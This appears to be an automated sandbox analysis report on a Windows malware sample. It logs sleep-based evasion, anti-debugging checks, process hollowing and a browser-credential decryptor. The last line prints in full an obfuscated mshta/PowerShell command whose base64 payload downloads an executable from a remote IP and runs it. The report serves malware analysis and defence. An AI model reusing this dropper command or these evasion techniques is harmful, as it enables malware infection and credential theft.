                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: 28690000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: 28910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: 2A910000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,16_2_004019F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599561Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598655Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598546Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598411Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597728Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597575Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597357Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597141Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597027Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596811Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596482Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595719Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595391Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595154Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595043Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594923Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594733Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594545Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594109Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594000Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 593891Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 593766Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 6867Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7365Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2258Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifWindow / User API: threadDelayed 6860Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifWindow / User API: threadDelayed 2974Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 7804Thread sleep count: 6867 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 7365 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep count: 2258 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 3104Thread sleep count: 6860 > 30Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 3104Thread sleep count: 2974 > 30Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599561s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599453s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599234s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599125s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -599016s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598891s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598766s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598655s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598546s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598411s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -598092s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597728s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597575s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597469s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597357s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597250s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597141s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -597027s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596922s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596811s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596703s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596594s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596482s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596374s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596266s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596155s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595828s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595719s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595609s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595499s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595391s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595281s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595154s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -595043s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594923s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594733s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594545s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594437s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594328s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594218s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594109s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -594000s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -593891s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pif TID: 1408Thread sleep time: -593766s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02E952F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,11_2_02E952F8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599561Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598655Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598546Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598411Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 598092Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597728Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597575Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597357Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597141Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 597027Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596811Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596482Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596374Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595719Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595391Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595154Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 595043Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594923Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594733Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594545Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594328Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594218Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594109Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 594000Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 593891Jump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifThread delayed: delay time: 593766Jump to behavior
                  Source: dajivhqI.pif, 00000010.00000002.2494483667.0000000026AA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?"
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1410505100.00000000083C5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1410505100.00000000083A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1399095637.0000000007461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000003.00000002.1384687174.0000000004CE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: csrss.exe, 0000000B.00000002.1358126115.0000000000845000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\csrss.exeAPI call chain: ExitProcess graph end nodegraph_11-28485
                  Source: C:\Users\user\Links\dajivhqI.pifAPI call chain: ExitProcess graph end nodegraph_16-51852
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EAA5B0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,11_2_02EAA5B0
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_2B5EB308 LdrInitializeThunk,LdrInitializeThunk,16_2_2B5EB308
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0040CE09
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,16_2_004019F0
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 11_2_02EA3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,11_2_02EA3E20
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0040ADB0 GetProcessHeap,HeapFree,16_2_0040ADB0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0040CE09
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0040E61C
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00416F6A
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_2_004123F1 SetUnhandledExceptionFilter,16_2_004123F1
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_1_0040CE09
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_1_0040E61C
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_1_00416F6A
                  Source: C:\Users\user\Links\dajivhqI.pifCode function: 16_1_004123F1 SetUnhandledExceptionFilter,16_1_004123F1
                  Source: C:\Users\user\Links\dajivhqI.pifMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: amsi32_7120.amsi.csv, type: OTHER
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 16.2.dajivhqI.pif.2b4e0000.10.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: C:\Users\user\Links\dajivhqI.pif base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection unmapped: C:\Users\user\Links\dajivhqI.pif base address: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: C:\Users\user\Links\dajivhqI.pif base: 34A008Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErSHeLL -eX BYPass -nOp -w 1 -c DeviceCREdEntialdEpLoyMent ; iEx($(IEX('[SYSteM.TeXT.ENCoDinG]'+[CHar]58+[chaR]58+'UTf8.GETSTRING([SYsTeM.converT]'+[Char]0X3A+[CHAr]0x3a+'FRomBaSe64sTRiNG('+[CHaR]34+'JGpJVDE3aWdEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFckRlZmlOSXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSVFOak56ZXJlbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUVQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFIZHlKeixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxaWZSaGwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtaE95RFdxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYTEJ3RkNQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRqSVQxN2lnRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4yMjcuMjI4LjIyLzU0L2NzcnNzLmV4ZSIsIiRlbnY6QVBQREFUQVxjc3Jzcy5leGUiLDAsMCk7c3RBcnQtc0xFRVAoMyk7aU52T2tFLWlURU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHaR]0X22+'))')))"Jump to behavior
